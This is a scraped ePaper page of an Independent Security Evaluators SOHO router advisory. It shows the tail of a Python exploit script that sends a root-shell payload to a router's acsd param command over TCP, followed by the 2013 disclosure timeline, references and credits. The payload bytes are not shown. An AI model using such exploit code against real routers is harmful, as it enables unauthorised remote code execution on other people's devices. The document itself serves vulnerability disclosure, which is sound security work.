ISE SOHO Vulnerability Catalog Published - Independent Security ...
ISE SOHO Vulnerability Catalog Published - Independent Security ...
ISE SOHO Vulnerability Catalog Published - Independent Security ...
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
try: <br />
print """ [*] Attempting to exploit the acsd param command. <br />
[*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d. <br />
[*] Payload Length: %d bytes.""" % (victim, port, len(sploit)) <br />
net_sock.send(sploit) <br />
sleep(1) <br />
except: <br />
print "\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\n\n%s\n" % (victim, exc_info()) <br />
sleep(1) <br />
exit(0) <br />
try: <br />
print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution! <br />
[*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\n""" <br />
net_sock.close() <br />
except: <br />
print "\n [!!!] There was an error closing the network socket. [!!!]\n\n%s\n" % exc_info() <br />
sleep(1) <br />
exit(0) <br />
if __name__ == "__main__": <br />
main() <br />
Disclosure Timeline<br />
♦ 7/26/2013 - Public Disclosure<br />
References<br />
♦ Advisory/Video: http://infosec42.blogspot.com<br />
♦ http://securityevaluators.com/content/case-studies/<br />
Credit<br />
♦ Discovered By: Jacob Holcomb and Jacob Thompson – <strong>Security</strong> Analysts @<br />
<strong>Independent</strong> <strong>Security</strong> Evaluators<br />
♦ Exploited By: Jacob Holcomb – <strong>Security</strong> Analyst @ <strong>Independent</strong> <strong>Security</strong><br />
Evaluators<br />
<br />
99